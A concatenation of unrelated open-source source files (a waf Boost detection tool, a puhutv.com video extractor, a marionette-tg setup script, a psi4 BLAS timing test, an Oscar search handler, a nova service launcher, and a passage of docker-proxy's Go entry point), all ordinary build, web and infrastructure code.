# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4: | unknown | codeparrot/codeparrot-clean | ||
#! /usr/bin/env python
# encoding: utf-8
# WARNING! Do not edit! http://waf.googlecode.com/git/docs/wafbook/single.html#_obtaining_the_waf_file
'''
This is an extra tool, not bundled with the default waf binary.
To add the boost tool to the waf file:
$ ./waf-light --tools=compat15,boost
or, if you have waf >= 1.6.2
$ ./waf update --files=boost
When using this tool, the wscript will look like:
def options(opt):
opt.load('compiler_cxx boost')
def configure(conf):
conf.load('compiler_cxx boost')
conf.check_boost(lib='system filesystem')
def build(bld):
bld(source='main.cpp', target='app', use='BOOST')
Options are generated, in order to specify the location of boost includes/libraries.
The `check_boost` configuration function allows to specify the used boost libraries.
It can also provide default arguments to the --boost-static and --boost-mt command-line arguments.
Everything will be packaged together in a BOOST component that you can use.
When using MSVC, a lot of compilation flags need to match your BOOST build configuration:
- you may have to add /EHsc to your CXXFLAGS or define boost::throw_exception if BOOST_NO_EXCEPTIONS is defined.
Errors: C4530
- boost libraries will try to be smart and use the (pretty but often not useful) auto-linking feature of MSVC
So before calling `conf.check_boost` you might want to disabling by adding:
conf.env.DEFINES_BOOST += ['BOOST_ALL_NO_LIB']
Errors:
- boost might also be compiled with /MT, which links the runtime statically.
If you have problems with redefined symbols,
self.env['DEFINES_%s' % var] += ['BOOST_ALL_NO_LIB']
self.env['CXXFLAGS_%s' % var] += ['/MD', '/EHsc']
Passing `--boost-linkage_autodetect` might help ensuring having a correct linkage in some basic cases.
'''
import sys
import re
from waflib import Utils,Logs,Errors
from waflib.Configure import conf
BOOST_LIBS=['/usr/lib','/usr/local/lib','/opt/local/lib','/sw/lib','/lib']
BOOST_INCLUDES=['/usr/include','/usr/local/include','/opt/local/include','/sw/include']
BOOST_VERSION_FILE='boost/version.hpp'
BOOST_VERSION_CODE='''
#include <iostream>
#include <boost/version.hpp>
int main() { std::cout << BOOST_LIB_VERSION << std::endl; }
'''
PLATFORM=Utils.unversioned_sys_platform()
detect_intel=lambda env:(PLATFORM=='win32')and'iw'or'il'
detect_clang=lambda env:(PLATFORM=='darwin')and'clang-darwin'or'clang'
detect_mingw=lambda env:(re.search('MinGW',env.CXX[0]))and'mgw'or'gcc'
BOOST_TOOLSETS={'borland':'bcb','clang':detect_clang,'como':'como','cw':'cw','darwin':'xgcc','edg':'edg','g++':detect_mingw,'gcc':detect_mingw,'icpc':detect_intel,'intel':detect_intel,'kcc':'kcc','kylix':'bck','mipspro':'mp','mingw':'mgw','msvc':'vc','qcc':'qcc','sun':'sw','sunc++':'sw','tru64cxx':'tru','vacpp':'xlc'}
def options(opt):
opt.add_option('--boost-includes',type='string',default='',dest='boost_includes',help='''path to the boost includes root (~boost root)
e.g. /path/to/boost_1_47_0''')
opt.add_option('--boost-libs',type='string',default='',dest='boost_libs',help='''path to the directory where the boost libs are
e.g. /path/to/boost_1_47_0/stage/lib''')
opt.add_option('--boost-static',action='store_true',default=False,dest='boost_static',help='link with static boost libraries (.lib/.a)')
opt.add_option('--boost-mt',action='store_true',default=False,dest='boost_mt',help='select multi-threaded libraries')
opt.add_option('--boost-abi',type='string',default='',dest='boost_abi',help='''select libraries with tags (dgsyp, d for debug),
see doc Boost, Getting Started, chapter 6.1''')
opt.add_option('--boost-linkage_autodetect',action="store_true",dest='boost_linkage_autodetect',help="auto-detect boost linkage options (don't get used to it / might break other stuff)")
opt.add_option('--boost-toolset',type='string',default='',dest='boost_toolset',help='force a toolset e.g. msvc, vc90, \
gcc, mingw, mgw45 (default: auto)')
py_version='%d%d'%(sys.version_info[0],sys.version_info[1])
opt.add_option('--boost-python',type='string',default=py_version,dest='boost_python',help='select the lib python with this version \
(default: %s)'%py_version)
@conf
def __boost_get_version_file(self,dir):
try:
return self.root.find_dir(dir).find_node(BOOST_VERSION_FILE)
except:
return None
@conf
def boost_get_version(self,dir):
re_but=re.compile('^#define\\s+BOOST_LIB_VERSION\\s+"(.*)"$',re.M)
try:
val=re_but.search(self.__boost_get_version_file(dir).read()).group(1)
except:
val=self.check_cxx(fragment=BOOST_VERSION_CODE,includes=[dir],execute=False,define_ret=True)
return val
@conf
def boost_get_includes(self,*k,**kw):
includes=k and k[0]or kw.get('includes',None)
if includes and self.__boost_get_version_file(includes):
return includes
for dir in BOOST_INCLUDES:
if self.__boost_get_version_file(dir):
return dir
if includes:
self.fatal('headers not found in %s'%includes)
else:
self.fatal('headers not found, please provide a --boost-includes argument (see help)')
@conf
def boost_get_toolset(self,cc):
toolset=cc
if not cc:
build_platform=Utils.unversioned_sys_platform()
if build_platform in BOOST_TOOLSETS:
cc=build_platform
else:
cc=self.env.CXX_NAME
if cc in BOOST_TOOLSETS:
toolset=BOOST_TOOLSETS[cc]
return isinstance(toolset,str)and toolset or toolset(self.env)
@conf
def __boost_get_libs_path(self,*k,**kw):
''' return the lib path and all the files in it '''
if'files'in kw:
return self.root.find_dir('.'),Utils.to_list(kw['files'])
libs=k and k[0]or kw.get('libs',None)
if libs:
path=self.root.find_dir(libs)
files=path.ant_glob('*boost_*')
if not libs or not files:
for dir in BOOST_LIBS:
try:
path=self.root.find_dir(dir)
files=path.ant_glob('*boost_*')
if files:
break
path=self.root.find_dir(dir+'64')
files=path.ant_glob('*boost_*')
if files:
break
except:
path=None
if not path:
if libs:
self.fatal('libs not found in %s'%libs)
else:
self.fatal('libs not found, please provide a --boost-libs argument (see help)')
self.to_log('Found the boost path in %r with the libraries:'%path)
for x in files:
self.to_log(' %r'%x)
return path,files
@conf
def boost_get_libs(self,*k,**kw):
'''
return the lib path and the required libs
according to the parameters
'''
path,files=self.__boost_get_libs_path(**kw)
t=[]
if kw.get('mt',False):
t.append('mt')
if kw.get('abi',None):
t.append(kw['abi'])
tags=t and'(-%s)+'%'-'.join(t)or''
toolset=self.boost_get_toolset(kw.get('toolset',''))
toolset_pat='(-%s[0-9]{0,3})+'%toolset
version='(-%s)+'%self.env.BOOST_VERSION
def find_lib(re_lib,files):
for file in files:
if re_lib.search(file.name):
self.to_log('Found boost lib %s'%file)
return file
return None
def format_lib_name(name):
if name.startswith('lib')and self.env.CC_NAME!='msvc':
name=name[3:]
return name[:name.rfind('.')]
libs=[]
for lib in Utils.to_list(k and k[0]or kw.get('lib',None)):
py=(lib=='python')and'(-py%s)+'%kw['python']or''
for pattern in['boost_%s%s%s%s%s'%(lib,toolset_pat,tags,py,version),'boost_%s%s%s%s'%(lib,tags,py,version),'boost_%s%s%s'%(lib,tags,version),'boost_%s%s%s%s'%(lib,toolset_pat,tags,py),'boost_%s%s%s'%(lib,tags,py),'boost_%s%s'%(lib,tags)]:
self.to_log('Trying pattern %s'%pattern)
file=find_lib(re.compile(pattern),files)
if file:
libs.append(format_lib_name(file.name))
break
else:
self.fatal('lib %s not found in %s'%(lib,path.abspath()))
return path.abspath(),libs
@conf
def check_boost(self,*k,**kw):
if not self.env['CXX']:
self.fatal('load a c++ compiler first, conf.load("compiler_cxx")')
params={'lib':k and k[0]or kw.get('lib',None)}
for key,value in self.options.__dict__.items():
if not key.startswith('boost_'):
continue
key=key[len('boost_'):]
params[key]=value and value or kw.get(key,'')
var=kw.get('uselib_store','BOOST')
self.start_msg('Checking boost includes')
self.env['INCLUDES_%s'%var]=inc=self.boost_get_includes(**params)
self.env.BOOST_VERSION=self.boost_get_version(inc)
self.end_msg(self.env.BOOST_VERSION)
if Logs.verbose:
Logs.pprint('CYAN',' path : %s'%self.env['INCLUDES_%s'%var])
if not params['lib']:
return
self.start_msg('Checking boost libs')
suffix=params.get('static',None)and'ST'or''
path,libs=self.boost_get_libs(**params)
self.env['%sLIBPATH_%s'%(suffix,var)]=[path]
self.env['%sLIB_%s'%(suffix,var)]=libs
self.end_msg('ok')
if Logs.verbose:
Logs.pprint('CYAN',' path : %s'%path)
Logs.pprint('CYAN',' libs : %s'%libs)
def try_link():
if'system'in params['lib']:
self.check_cxx(fragment="\n".join(['#include <boost/system/error_code.hpp>','int main() { boost::system::error_code c; }',]),use=var,execute=False,)
if'thread'in params['lib']:
self.check_cxx(fragment="\n".join(['#include <boost/thread.hpp>','int main() { boost::thread t; }',]),use=var,execute=False,)
if params.get('linkage_autodetect',False):
self.start_msg("Attempting to detect boost linkage flags")
toolset=self.boost_get_toolset(kw.get('toolset',''))
if toolset in['vc']:
self.env['DEFINES_%s'%var]+=['BOOST_ALL_NO_LIB']
has_dlls=False
for x in Utils.listdir(path):
if x.endswith(self.env.cxxshlib_PATTERN%''):
has_dlls=True
break
if not has_dlls:
self.env['STLIBPATH_%s'%var]=[path]
self.env['STLIB_%s'%var]=libs
del self.env['LIB_%s'%var]
del self.env['LIBPATH_%s'%var]
for cxxflags in(['/MD','/EHsc'],[]):
self.env.stash()
self.env["CXXFLAGS_%s"%var]+=cxxflags
try:
try_link()
self.end_msg("ok: winning cxxflags combination: %s"%(self.env["CXXFLAGS_%s"%var]))
e=None
break
except Errors.ConfigurationError as exc:
self.env.revert()
e=exc
if e is not None:
self.fatal("Could not auto-detect boost linking flags combination, you may report it to boost.py author",ex=e)
else:
self.fatal("Boost linkage flags auto-detection not implemented (needed ?) for this toolchain")
else:
self.start_msg('Checking for boost linkage')
try:
try_link()
except Errors.ConfigurationError ,e:
self.fatal("Could not link against boost libraries using supplied options")
self.end_msg('ok') | unknown | codeparrot/codeparrot-clean | ||
# coding: utf-8
from __future__ import unicode_literals
from .common import InfoExtractor
from ..compat import (
compat_HTTPError,
compat_str,
)
from ..utils import (
ExtractorError,
int_or_none,
float_or_none,
parse_resolution,
str_or_none,
try_get,
unified_timestamp,
url_or_none,
urljoin,
)
class PuhuTVIE(InfoExtractor):
_VALID_URL = r'https?://(?:www\.)?puhutv\.com/(?P<id>[^/?#&]+)-izle'
IE_NAME = 'puhutv'
_TESTS = [{
# film
'url': 'https://puhutv.com/sut-kardesler-izle',
'md5': 'fbd8f2d8e7681f8bcd51b592475a6ae7',
'info_dict': {
'id': '5085',
'display_id': 'sut-kardesler',
'ext': 'mp4',
'title': 'Süt Kardeşler',
'description': 'md5:405fd024df916ca16731114eb18e511a',
'thumbnail': r're:^https?://.*\.jpg$',
'duration': 4832.44,
'creator': 'Arzu Film',
'timestamp': 1469778212,
'upload_date': '20160729',
'release_year': 1976,
'view_count': int,
'tags': ['Aile', 'Komedi', 'Klasikler'],
},
}, {
# episode, geo restricted, bypassable with --geo-verification-proxy
'url': 'https://puhutv.com/jet-sosyete-1-bolum-izle',
'only_matching': True,
}, {
# 4k, with subtitles
'url': 'https://puhutv.com/dip-1-bolum-izle',
'only_matching': True,
}]
_SUBTITLE_LANGS = {
'English': 'en',
'Deutsch': 'de',
'عربى': 'ar'
}
def _real_extract(self, url):
display_id = self._match_id(url)
info = self._download_json(
urljoin(url, '/api/slug/%s-izle' % display_id),
display_id)['data']
video_id = compat_str(info['id'])
title = info.get('name') or info['title']['name']
if info.get('display_name'):
title = '%s %s' % (title, info.get('display_name'))
try:
videos = self._download_json(
'https://puhutv.com/api/assets/%s/videos' % video_id,
display_id, 'Downloading video JSON',
headers=self.geo_verification_headers())
except ExtractorError as e:
if isinstance(e.cause, compat_HTTPError) and e.cause.code == 403:
self.raise_geo_restricted()
raise
formats = []
for video in videos['data']['videos']:
media_url = url_or_none(video.get('url'))
if not media_url:
continue
playlist = video.get('is_playlist')
if video.get('stream_type') == 'hls' and playlist is True:
formats.extend(self._extract_m3u8_formats(
media_url, video_id, 'mp4', entry_protocol='m3u8_native',
m3u8_id='hls', fatal=False))
continue
quality = int_or_none(video.get('quality'))
f = {
'url': media_url,
'ext': 'mp4',
'height': quality
}
video_format = video.get('video_format')
if video_format == 'hls' and playlist is False:
format_id = 'hls'
f['protocol'] = 'm3u8_native'
elif video_format == 'mp4':
format_id = 'http'
else:
continue
if quality:
format_id += '-%sp' % quality
f['format_id'] = format_id
formats.append(f)
self._sort_formats(formats)
description = try_get(
info, lambda x: x['title']['description'],
compat_str) or info.get('description')
timestamp = unified_timestamp(info.get('created_at'))
creator = try_get(
info, lambda x: x['title']['producer']['name'], compat_str)
duration = float_or_none(
try_get(info, lambda x: x['content']['duration_in_ms'], int),
scale=1000)
view_count = try_get(info, lambda x: x['content']['watch_count'], int)
images = try_get(
info, lambda x: x['content']['images']['wide'], dict) or {}
thumbnails = []
for image_id, image_url in images.items():
if not isinstance(image_url, compat_str):
continue
if not image_url.startswith(('http', '//')):
image_url = 'https://%s' % image_url
t = parse_resolution(image_id)
t.update({
'id': image_id,
'url': image_url
})
thumbnails.append(t)
release_year = try_get(info, lambda x: x['title']['released_at'], int)
season_number = int_or_none(info.get('season_number'))
season_id = str_or_none(info.get('season_id'))
episode_number = int_or_none(info.get('episode_number'))
tags = []
for genre in try_get(info, lambda x: x['title']['genres'], list) or []:
if not isinstance(genre, dict):
continue
genre_name = genre.get('name')
if genre_name and isinstance(genre_name, compat_str):
tags.append(genre_name)
subtitles = {}
for subtitle in try_get(
info, lambda x: x['content']['subtitles'], list) or []:
if not isinstance(subtitle, dict):
continue
lang = subtitle.get('language')
sub_url = url_or_none(subtitle.get('url'))
if not lang or not isinstance(lang, compat_str) or not sub_url:
continue
subtitles[self._SUBTITLE_LANGS.get(lang, lang)] = [{
'url': sub_url
}]
return {
'id': video_id,
'display_id': display_id,
'title': title,
'description': description,
'season_id': season_id,
'season_number': season_number,
'episode_number': episode_number,
'release_year': release_year,
'timestamp': timestamp,
'creator': creator,
'view_count': view_count,
'duration': duration,
'tags': tags,
'subtitles': subtitles,
'thumbnails': thumbnails,
'formats': formats
}
class PuhuTVSerieIE(InfoExtractor):
_VALID_URL = r'https?://(?:www\.)?puhutv\.com/(?P<id>[^/?#&]+)-detay'
IE_NAME = 'puhutv:serie'
_TESTS = [{
'url': 'https://puhutv.com/deniz-yildizi-detay',
'info_dict': {
'title': 'Deniz Yıldızı',
'id': 'deniz-yildizi',
},
'playlist_mincount': 205,
}, {
# a film detail page which is using same url with serie page
'url': 'https://puhutv.com/kaybedenler-kulubu-detay',
'only_matching': True,
}]
def _extract_entries(self, seasons):
for season in seasons:
season_id = season.get('id')
if not season_id:
continue
page = 1
has_more = True
while has_more is True:
season = self._download_json(
'https://galadriel.puhutv.com/seasons/%s' % season_id,
season_id, 'Downloading page %s' % page, query={
'page': page,
'per': 40,
})
episodes = season.get('episodes')
if isinstance(episodes, list):
for ep in episodes:
slug_path = str_or_none(ep.get('slugPath'))
if not slug_path:
continue
video_id = str_or_none(int_or_none(ep.get('id')))
yield self.url_result(
'https://puhutv.com/%s' % slug_path,
ie=PuhuTVIE.ie_key(), video_id=video_id,
video_title=ep.get('name') or ep.get('eventLabel'))
page += 1
has_more = season.get('hasMore')
def _real_extract(self, url):
playlist_id = self._match_id(url)
info = self._download_json(
urljoin(url, '/api/slug/%s-detay' % playlist_id),
playlist_id)['data']
seasons = info.get('seasons')
if seasons:
return self.playlist_result(
self._extract_entries(seasons), playlist_id, info.get('name'))
# For films, these are using same url with series
video_id = info.get('slug') or info['assets'][0]['slug']
return self.url_result(
'https://puhutv.com/%s-izle' % video_id,
PuhuTVIE.ie_key(), video_id) | unknown | codeparrot/codeparrot-clean | ||
#!/usr/bin/env python
# coding: utf-8
#openbsd python setup.py
import os
from setuptools import setup
if os.name == 'nt':
import py2exe
setup(name='marionette-tg',
console=['bin/marionette_client','bin/marionette_server'],
scripts=['bin/marionette_client','bin/marionette_server'],
test_suite='marionette_tg',
packages=['marionette_tg','marionette_tg.plugins','marionette_tg.executables'],
package_data={'marionette_tg': ['marionette.conf','formats/*.mar','formats/*.py']},
zipfile="marionette.zip",
options={"py2exe": {
"bundle_files": 2,
"optimize": 0,
"compressed": True,
"includes": [
'marionette_tg.plugins._channel',
'marionette_tg.plugins._fte',
'marionette_tg.plugins._io',
'marionette_tg.plugins._model',
'marionette_tg.plugins._tg',
],
"dll_excludes": ["w9xpopen.exe"],
}
},
include_package_data=True,
install_requires=[''],
version='0.0.3',
description='Marionette rebuild',
long_description='layerProx rebuild of marionette',
author='Filip kalebo',
author_email='flipchan@riseup.net',
url='https://github.com/flipchan/layerProx') | unknown | codeparrot/codeparrot-clean | ||
import time
import pytest
import numpy as np
import multiprocessing
import psi4
# Test below is fine on its own but erratic through pytest. Most likely
# to succeed as first test collected, so here it lies.
@pytest.mark.xfail(True, reason='threading treatment suspect', run=True)
def disabled_test_threaded_blas():
threads = multiprocessing.cpu_count()
threads = int(threads / 2)
times = {}
size = [200, 500, 2000, 5000]
threads = [1, threads]
for th in threads:
psi4.set_num_threads(th)
for sz in size:
nruns = max(1, int(1.e10 / (sz ** 3)))
a = psi4.core.Matrix(sz, sz)
b = psi4.core.Matrix(sz, sz)
c = psi4.core.Matrix(sz, sz)
tp4 = time.time()
for n in range(nruns):
c.gemm(False, False, 1.0, a, b, 0.0)
retp4 = (time.time() - tp4) / nruns
tnp = time.time()
for n in range(nruns):
np.dot(a, b, out=np.asarray(c))
retnp = (time.time() - tnp) / nruns
print("Time for threads %2d, size %5d: Psi4: %12.6f NumPy: %12.6f" % (th, sz, retp4, retnp))
if sz == 5000:
times["p4-n{}".format(th)] = retp4
times["np-n{}".format(th)] = retnp
assert psi4.get_num_threads() == th
rat1 = times["np-n" + str(threads[-1])] / times["p4-n" + str(threads[-1])]
rat2 = times["p4-n" + str(threads[0])] / times["p4-n" + str(threads[-1])]
print(" NumPy@n%d : Psi4@n%d ratio (want ~1): %.2f" % (threads[-1], threads[-1], rat1))
print(" Psi4@n%d : Psi4@n%d ratio (want ~%d): %.2f" % (threads[0], threads[-1], threads[-1], rat2))
assert pytest.approx(rat1, 0.2) == 1.0
assert pytest.approx(rat2, 0.8) == threads[-1] | unknown | codeparrot/codeparrot-clean | ||
from django.core.paginator import InvalidPage, Paginator
from django.utils.translation import ugettext_lazy as _
from haystack import connections
from oscar.core.loading import get_class
from . import facets
FacetMunger = get_class('search.facets', 'FacetMunger')
class SearchHandler(object):
"""
A class that is concerned with performing a search and paginating the
results. The search is triggered upon initialisation (mainly to have a
predictable point to process any errors). Search results are cached, so
they can be accessed multiple times without incurring any overhead.
The raison d'etre for this third way to interface with Haystack is
two-fold. The Haystack search form doesn't do enough for our needs, and
basing a view off a Haystack search view is unnecessarily invasive.
Furthermore, using our own search handler means it is easy to swap
out Haystack, which has been considered before.
Usage:
handler = SearchHandler(request.GET, request.get_full_path)
found_objects = handler.get_paginated_objects()
context = handler.get_search_context_data()
Error handling:
You need to catch an InvalidPage exception which gets thrown when an
invalid page number is supplied.
"""
form_class = None
model_whitelist = None
paginate_by = None
paginator_class = Paginator
page_kwarg = 'page'
def __init__(self, request_data, full_path):
self.full_path = full_path
self.request_data = request_data
# Triggers the search.
search_queryset = self.get_search_queryset()
self.search_form = self.get_search_form(
request_data, search_queryset)
self.results = self.get_search_results(self.search_form)
# If below raises an UnicodeDecodeError, you're running pysolr < 3.2
# with Solr 4.
self.paginator, self.page = self.paginate_queryset(
self.results, request_data)
# Search related methods
def get_search_results(self, search_form):
"""
Perform the actual search using Haystack's search form. Returns
a SearchQuerySet. The SQS is empty if the form is invalid.
"""
return search_form.search()
def get_search_form(self, request_data, search_queryset):
"""
Return a bound version of Haystack's search form.
"""
kwargs = {
'data': request_data,
'selected_facets': request_data.getlist("selected_facets"),
'searchqueryset': search_queryset
}
return self.form_class(**kwargs)
def get_search_queryset(self):
"""
Returns the search queryset that is used as a base for the search.
"""
sqs = facets.base_sqs()
if self.model_whitelist:
# Limit queryset to specified list of models
sqs = sqs.models(*self.model_whitelist)
return sqs
# Pagination related methods
def paginate_queryset(self, queryset, request_data):
"""
Paginate the search results. This is a simplified version of
Django's MultipleObjectMixin.paginate_queryset
"""
paginator = self.get_paginator(queryset)
page_kwarg = self.page_kwarg
page = request_data.get(page_kwarg, 1)
try:
page_number = int(page)
except ValueError:
if page == 'last':
page_number = paginator.num_pages
else:
raise InvalidPage(_(
"Page is not 'last', nor can it be converted to an int."))
# This can also raise an InvalidPage exception.
return paginator, paginator.page(page_number)
def get_paginator(self, queryset):
"""
Return a paginator. Override this to set settings like orphans,
allow_empty, etc.
"""
return self.paginator_class(queryset, self.paginate_by)
# Accessing the search results and meta data
def bulk_fetch_results(self, paginated_results):
"""
This method gets paginated search results and returns a list of Django
objects in the same order.
It preserves the order without doing any ordering in Python, even
when more than one Django model are returned in the search results. It
also uses the same queryset that was used to populate the search
queryset, so any select_related/prefetch_related optimisations are
in effect.
It is heavily based on Haystack's SearchQuerySet.post_process_results,
but works on the paginated results instead of all of them.
"""
objects = []
models_pks = loaded_objects = {}
for result in paginated_results:
models_pks.setdefault(result.model, []).append(result.pk)
search_backend_alias = self.results.query.backend.connection_alias
for model in models_pks:
ui = connections[search_backend_alias].get_unified_index()
index = ui.get_index(model)
queryset = index.read_queryset(using=search_backend_alias)
loaded_objects[model] = queryset.in_bulk(models_pks[model])
for result in paginated_results:
model_objects = loaded_objects.get(result.model, {})
try:
result._object = model_objects[int(result.pk)]
except KeyError:
# The object was either deleted since we indexed or should
# be ignored; fail silently.
pass
else:
objects.append(result._object)
return objects
def get_paginated_objects(self):
"""
Return a paginated list of Django model instances. The call is cached.
"""
if hasattr(self, '_objects'):
return self._objects
else:
paginated_results = self.page.object_list
self._objects = self.bulk_fetch_results(paginated_results)
return self._objects
def get_facet_munger(self):
return FacetMunger(
self.full_path,
self.search_form.selected_multi_facets,
self.results.facet_counts())
def get_search_context_data(self, context_object_name=None):
"""
Return metadata about the search in a dictionary useful to populate
template contexts. If you pass in a context_object_name, the dictionary
will also contain the actual list of found objects.
The expected usage is to call this function in your view's
get_context_data:
search_context = self.search_handler.get_search_context_data(
self.context_object_name)
context.update(search_context)
return context
"""
# Use the FacetMunger to convert Haystack's awkward facet data into
# something the templates can use.
# Note that the FacetMunger accesses object_list (unpaginated results),
# whereas we use the paginated search results to populate the context
# with products
munger = self.get_facet_munger()
facet_data = munger.facet_data()
has_facets = any([data['results'] for data in facet_data.values()])
context = {
'facet_data': facet_data,
'has_facets': has_facets,
# This is a serious code smell; we just pass through the selected
# facets data to the view again, and the template adds those
# as fields to the form. This hack ensures that facets stay
# selected when changing relevancy.
'selected_facets': self.request_data.getlist('selected_facets'),
'form': self.search_form,
'paginator': self.paginator,
'page_obj': self.page,
}
# It's a pretty common pattern to want the actual results in the
# context, so pass them in if context_object_name is set.
if context_object_name is not None:
context[context_object_name] = self.get_paginated_objects()
return context | unknown | codeparrot/codeparrot-clean | ||
# Copyright 2011 OpenStack Foundation
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Starter script for all nova services.
This script attempts to start all the nova services in one process. Each
service is started in its own greenthread. Please note that exceptions and
sys.exit() on the starting of a service are logged and the script will
continue attempting to launch the rest of the services.
"""
import sys
from oslo_config import cfg
from oslo_log import log as logging
from nova import config
from nova.i18n import _LE
from nova import objects
from nova.objectstore import s3server
from nova import service
from nova import utils
from nova.vnc import xvp_proxy
CONF = cfg.CONF
CONF.import_opt('manager', 'nova.conductor.api', group='conductor')
CONF.import_opt('topic', 'nova.conductor.api', group='conductor')
CONF.import_opt('enabled_apis', 'nova.service')
CONF.import_opt('enabled_ssl_apis', 'nova.service')
def main():
config.parse_args(sys.argv)
logging.setup(CONF, "nova")
LOG = logging.getLogger('nova.all')
utils.monkey_patch()
objects.register_all()
launcher = service.process_launcher()
# nova-api
for api in CONF.enabled_apis:
try:
should_use_ssl = api in CONF.enabled_ssl_apis
server = service.WSGIService(api, use_ssl=should_use_ssl)
launcher.launch_service(server, workers=server.workers or 1)
except (Exception, SystemExit):
LOG.exception(_LE('Failed to load %s-api'), api)
for mod in [s3server, xvp_proxy]:
try:
launcher.launch_service(mod.get_wsgi_server())
except (Exception, SystemExit):
LOG.exception(_LE('Failed to load %s'), mod.__name__)
for binary in ['nova-compute', 'nova-network', 'nova-scheduler',
'nova-cert', 'nova-conductor']:
# FIXME(sirp): Most service configs are defined in nova/service.py, but
# conductor has set a new precedent of storing these configs
# nova/<service>/api.py.
#
# We should update the existing services to use this new approach so we
# don't have to treat conductor differently here.
if binary == 'nova-conductor':
topic = CONF.conductor.topic
manager = CONF.conductor.manager
else:
topic = None
manager = None
try:
launcher.launch_service(service.Service.create(binary=binary,
topic=topic,
manager=manager))
except (Exception, SystemExit):
LOG.exception(_LE('Failed to load %s'), binary)
launcher.wait() | unknown | codeparrot/codeparrot-clean | ||
package main
import (
"flag"
"fmt"
"net"
"os"
"os/signal"
"syscall"
"github.com/ishidawataru/sctp"
"github.com/moby/moby/v2/dockerversion"
"golang.org/x/net/ipv4"
"golang.org/x/net/ipv6"
)
// The caller is expected to pass-in open file descriptors ...
const (
// Pipe for reporting status, as a string. "0\n" if the proxy
// started normally. "1\n<error message>" otherwise.
parentPipeFd uintptr = 3 + iota
// If -use-listen-fd=true, a listening socket ready to accept TCP
// connections or receive UDP. (Without that option on the command
// line, the listener needs to be opened by docker-proxy, for
// compatibility with older docker daemons. In this case fd 4
// may belong to the Go runtime.)
listenSockFd
)
func main() {
// Mark any files we expect to inherit as close-on-exec
// so that they are not unexpectedly inherited by any child processes
// if we ever need docker-proxy to exec something.
// This is safe to do even if the fd belongs to the Go runtime
// as it would be a no-op:
// the Go runtime marks all file descriptors it opens as close-on-exec.
// See the godoc for syscall.ForkLock for more information.
syscall.CloseOnExec(int(parentPipeFd))
syscall.CloseOnExec(int(listenSockFd))
config := parseFlags()
p, err := newProxy(config)
if config.ListenSock != nil {
config.ListenSock.Close()
}
_ = syscall.SetNonblock(int(parentPipeFd), true)
f := os.NewFile(parentPipeFd, "signal-parent")
if err != nil {
fmt.Fprintf(f, "1\n%s", err)
f.Close()
os.Exit(1)
}
go handleStopSignals(p)
fmt.Fprint(f, "0\n")
f.Close()
// Run will block until the proxy stops
p.Run()
}
func newProxy(config ProxyConfig) (p Proxy, err error) {
ipv := ip4
if config.HostIP.To4() == nil {
ipv = ip6
}
switch config.Proto {
case "tcp":
var listener *net.TCPListener
if config.ListenSock == nil {
// Fall back to HostIP:HostPort if no socket on fd 4, for compatibility with older daemons.
hostAddr := &net.TCPAddr{IP: config.HostIP, Port: config.HostPort}
listener, err = net.ListenTCP("tcp"+string(ipv), hostAddr)
if err != nil {
return nil, fmt.Errorf("failed to listen on %s: %w", hostAddr, err)
}
} else {
l, err := net.FileListener(config.ListenSock)
if err != nil {
return nil, err
}
var ok bool
listener, ok = l.(*net.TCPListener)
if !ok {
return nil, fmt.Errorf("unexpected socket type for listener fd: %s", l.Addr().Network())
}
}
container := &net.TCPAddr{IP: config.ContainerIP, Port: config.ContainerPort}
p, err = NewTCPProxy(listener, container)
case "udp":
var listener *net.UDPConn
if config.ListenSock == nil {
// Fall back to HostIP:HostPort if no socket on fd 4, for compatibility with older daemons.
hostAddr := &net.UDPAddr{IP: config.HostIP, Port: config.HostPort}
listener, err = net.ListenUDP("udp"+string(ipv), hostAddr)
if err != nil {
return nil, fmt.Errorf("failed to listen on %s: %w", hostAddr, err)
}
// We need to setsockopt(IP_PKTINFO) on the listener to get the destination address as an ancillary
// message. The daddr will be used as the source address when sending back replies coming from the
// container to the client. If we don't do this, the kernel will have to pick a source address for us, and
// it might not pick what the client expects. That would result in ICMP Port Unreachable.
if ipv == ip4 {
pc := ipv4.NewPacketConn(listener)
if err := pc.SetControlMessage(ipv4.FlagDst, true); err != nil {
return nil, fmt.Errorf("failed to setsockopt(IP_PKTINFO): %w", err)
}
} else {
pc := ipv6.NewPacketConn(listener)
if err := pc.SetControlMessage(ipv6.FlagDst, true); err != nil {
return nil, fmt.Errorf("failed to setsockopt(IPV6_RECVPKTINFO): %w", err)
}
}
} else {
l, err := net.FilePacketConn(config.ListenSock)
if err != nil {
return nil, err
}
var ok bool
listener, ok = l.(*net.UDPConn)
if !ok {
return nil, fmt.Errorf("unexpected socket type for listener fd: %s", l.LocalAddr().Network())
}
}
container := &net.UDPAddr{IP: config.ContainerIP, Port: config.ContainerPort}
p, err = NewUDPProxy(listener, container, ipv)
case "sctp":
var listener *sctp.SCTPListener
if config.ListenSock == nil {
hostAddr := &sctp.SCTPAddr{IPAddrs: []net.IPAddr{{IP: config.HostIP}}, Port: config.HostPort}
listener, err = sctp.ListenSCTP("sctp"+string(ipv), hostAddr)
if err != nil {
return nil, fmt.Errorf("failed to listen on %s: %w", hostAddr, err)
}
} else {
if listener, err = sctp.FileListener(config.ListenSock); err != nil {
return nil, err
}
}
container := &sctp.SCTPAddr{IPAddrs: []net.IPAddr{{IP: config.ContainerIP}}, Port: config.ContainerPort}
p, err = NewSCTPProxy(listener, container)
default:
return nil, fmt.Errorf("unsupported protocol %s", config.Proto)
}
return p, err
}
type ProxyConfig struct {
Proto string
HostIP, ContainerIP net.IP
HostPort, ContainerPort int
ListenSock *os.File
}
// parseFlags parses the flags passed on reexec to create the TCP/UDP/SCTP
// net.Addrs to map the host and container ports.
func parseFlags() ProxyConfig {
var (
config ProxyConfig
useListenFd bool
printVer bool
)
flag.StringVar(&config.Proto, "proto", "tcp", "proxy protocol")
flag.TextVar(&config.HostIP, "host-ip", net.IPv4zero, "host ip")
flag.IntVar(&config.HostPort, "host-port", -1, "host port")
flag.TextVar(&config.ContainerIP, "container-ip", net.IPv4zero, "container ip")
flag.IntVar(&config.ContainerPort, "container-port", -1, "container port")
flag.BoolVar(&useListenFd, "use-listen-fd", false, "use a supplied listen fd")
